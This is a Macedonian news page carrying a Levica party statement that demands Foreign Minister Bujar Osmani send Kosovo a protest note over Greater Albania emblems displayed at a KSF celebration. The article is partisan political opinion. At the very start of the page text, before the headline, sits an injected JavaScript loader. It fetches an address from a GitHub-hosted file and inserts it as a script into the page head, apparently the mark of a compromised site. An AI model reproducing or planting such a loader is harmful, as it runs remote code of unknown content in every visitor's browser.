;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Левица бара Османи да реагира со протестна нота на косовските иредентистички пораки - Антропол
АктуелноЛокално

Левица бара Османи да реагира со протестна нота на косовските иредентистички пораки

  • Реакција на Политичката партија Леевица

Претседавачот во заминување на ОБСЕ Бујар Османи, да се одважи на иредентистичките пораки испратени од Косово, по повод прославата на формирањето на КБС. КБС, кои се формирани со кршење на резолуцијата 1244 на Обединети Нации и газење на меѓународното право, што не им дава никаков легитимитет, го „прославуваа празникот“ со амблеми на Голема Албанија, кои вклучуваат речиси половина од територијата на Република Македонија!

Овој државен непријателски чин од страна на делумно признаената држава Косово е направен во присуство на Претседателот Курти и Премиерката Османи, што дава целосно право истиот да се толкува како територијална ЗАКАНА. Дополнително, потсетуваме дека ваква порака беше испратена и во Тетово, кога градоначалникот Касами заедно со Курти вееје знаме на Голема Албанија, а целиот случај помина речиси несанкционирано.

Премолчувањето на овие, но и на бројни други инциденти, како и скандалот кога Министерот Османи, наместо за интересите на Македонија, бараше од Шпанија да ја признае независноста на Косово, не само што оправдува и поддржува иредентистичка политика, туку го прави и заговорник и борец за великоалбанската идеја, додека седи во фотелјата на македонското МНР и ужива во привилегиите платени од џебот на македонските граѓани.

Бараме за овој непријателски чин итно да се испрати протестна НОТА, да се известат меѓународните организации и да се побара јавно извинување од косовските власти кон Македонија пред меѓународната заедница. Во спротивно, улогата на Османи нема да може да се толкува како нешто друго, освен како на заговорник на великоалбанската идеја, која го нарушува суверенитетот на Македонија.

Дополнително, за испратената порака со територијални претензии очекуваме и соодветна реакција од министерката за одбрана на „земјата членка на НАТО“, Славјанка Петровска.